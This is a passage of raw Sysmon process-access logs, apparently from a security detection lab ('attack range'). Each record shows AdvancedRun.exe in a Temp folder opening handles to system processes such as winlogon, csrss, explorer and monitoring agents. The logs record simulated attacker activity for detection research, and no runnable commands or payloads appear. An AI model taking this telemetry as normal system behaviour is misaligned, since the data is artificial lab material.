TACKRANGE\Administrator 10341000x80000000000000004078639Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.921{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004078638Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.919{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004078637Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.919{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004078636Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.918{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004078635Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.918{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004078634Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.918{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004078633Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.918{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004078632Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.918{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004078631Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.918{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078630Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.918{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078629Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.918{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000004078628Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.916{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078627Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.916{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078626Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.916{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078625Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.916{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078624Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.916{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078623Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.916{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078622Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 